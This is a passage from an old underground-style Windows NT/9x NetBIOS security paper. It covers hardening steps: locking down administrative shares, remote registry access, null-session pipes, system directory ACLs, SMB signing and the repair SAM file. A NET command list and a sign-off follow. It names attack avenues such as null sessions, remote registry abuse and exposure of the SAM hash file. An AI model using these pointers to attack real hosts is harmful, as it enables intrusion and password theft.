(right-click the folder.. Sharing.. Permissions) and the default is Everyone:
Full Control. Take Everyone off every share and grant only the groups that
need it, and rely on the NTFS permissions underneath (5.7) for the rest. This
still leaves you vulnerable to attack, so it's important to secure each method
of penetration.

If you want to delete the administrative share ADMIN$ altogether you can do
this:

   C:\> net share ADMIN$ /d

but the Server service re-creates it (and C$, D$, ...) at the next boot. To
stop that for good add this to the registry:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
   Value name:  AutoShareServer   (AutoShareWks on NT Workstation)
   Type:        REG_DWORD
   Data:        0

Leave IPC$ alone; the system needs it.

===========================

5.6 - Restricting the Registry

Remote access to the registry is controlled by the permissions on this key.
It exists by default on NT Server, restricted to Administrators; on NT
Workstation it doesn't exist, and until you create it anybody who can reach
the box can connect to its registry:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg

Create the key if it isn't there, then check the security permissions on it
with regedt32 (Security.. Permissions) and make sure it's Administrators Full
Control and not even Read for Everyone. That one ACL is what stops the
Connect Network Registry trick and the Run key abuse in section 04 for
everybody who isn't an administrator.

If you have people other than the Administrator who need remote read access
to the registry you should at least keep null sessions away from it. A null
session can only open the named pipes listed in this value:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
   Value name:  NullSessionPipes
   Type:        REG_MULTI_SZ

Remove every pipe name from the list that your configuration doesn't need
(winreg is the remote registry pipe). The same key has NullSessionShares, the
list of shares a null session may reach, and it should normally be empty.

===========================

5.7 - Permissions

By default Everyone has Change on %systemroot% and %systemroot%\system32,
which means anybody who gets onto a share or the console can replace system
files and DLLs. You can't take Read away from users (the OS won't run without
it), but you should use the ACL editor (right-click.. Properties.. Security..
Permissions) to set Administrators and SYSTEM to Full Control and everybody
else to Read only on those directories. This needs NTFS; a FAT partition has
no permissions at all.

===========================

5.8 - SMB Signatures

Service Pack 3 and up provides a more secure way to authenticate NetBIOS
traffic. SMB Signatures provide mutual and message authentication: each SMB
packet carries a signature that is verified by both client and server, so a
session can't be hijacked or have packets altered by someone on the wire.
Note what it doesn't do: it doesn't stop null sessions or password guessing.
To enable SMB Signatures add the following values to the server's registry:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
   Value name:  EnableSecuritySignature    REG_DWORD   1
   Value name:  RequireSecuritySignature   REG_DWORD   1

and the following to each client's registry:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Rdr\Parameters
   Value name:  EnableSecuritySignature    REG_DWORD   1
   Value name:  RequireSecuritySignature   REG_DWORD   1

Enable means sign if the other side can, Require means refuse if it can't.
Require on the server means clients that don't support signing (anything
older than NT4 SP3, and Windows 9x without the update) can't connect at all,
so roll out Enable everywhere first and switch on Require once you know what
is talking to the box.

===========================

5.9 - Securing %systemroot%\repair\sam._

This is obviously something you don't want to overlook. In case you forgot,
the SAM file contains the network's users and their password hashes.
Basically just take the group Everyone off its permissions. Don't do it with
cacls /D Everyone: a deny entry for Everyone also denies the Administrators,
since they are members of Everyone too. Revoke Everyone's entry and leave the
rest of the ACL alone:

   cacls %systemroot%\repair\sam._ /E /R Everyone

or rewrite the whole ACL to the two accounts that need it (cacls asks for
confirmation):

   cacls %systemroot%\repair\sam._ /G Administrators:F SYSTEM:F

Do the same for the repair directory itself. And remember that the next time
you run rdisk /s the file is written again with the default permissions, so
re-run the cacls afterwards.

===========================

06 - NET Commands

For more information about a specific Microsoft NET command, type the command
name followed by /? (for example, NET VIEW /?). The list below is the Windows
9x client's help text; NT4's net.exe has these plus NET USER, NET LOCALGROUP,
NET GROUP, NET SHARE, NET SESSION and NET ACCOUNTS (NET ACCOUNTS is the
command-line version of the policy in 5.1), and doesn't have NET DIAG,
NET INIT, NET LOGON, NET LOGOFF, NET PASSWORD or NET VER.

NET CONFIG     Displays your current workgroup settings.
NET DIAG       Runs the Microsoft Network Diagnostics program to display
               diagnostic information about your network.
NET HELP       Provides information about commands and error messages.
NET INIT       Loads protocol and network-adapter drivers without binding them
               to Protocol Manager.
NET LOGOFF     Breaks the connection between your computer and the shared
               resources to which it is connected.
NET LOGON      Identifies you as a member of a workgroup.
NET PASSWORD   Changes your logon password.
NET PRINT      Displays information about print queues and controls print jobs.
NET START      Starts services.
NET STOP       Stops services.
NET TIME       Displays the time on or synchronizes your computer's clock with
               the clock on a Microsoft Windows for Workgroups, Windows NT,
               Windows 95, or NetWare time server.
NET USE        Connects to or disconnects from a shared resource or displays
               information about connections.
NET VER        Displays the type and version number of the workgroup
               redirector you are using.
NET VIEW       Displays a list of computers that share resources or a list of
               shared resources on a specific computer.

===========================

07 - Conclusion

There isn't a day that goes by that I don't use the information I've given
you here. I hope I've given you a good idea of what you can really do with
the LMHOSTS file. Also the registry editor can do a lot more than what I've
said here. I hope that what I've written has helped you in some way. Thanks
again for reading it, please continue to support me as I continue to release
quality papers. If you want to learn more you can contact me or NtWaK0 on
EFNet or you can read The Windows NT Wardoc by Rhino9. It's very informative
and I think you can learn a lot from it. Peace out.

=============================================
KEYROOT SYSTEMS AT WWW.WEOWNYOURLIVES.FOREVER
=============================================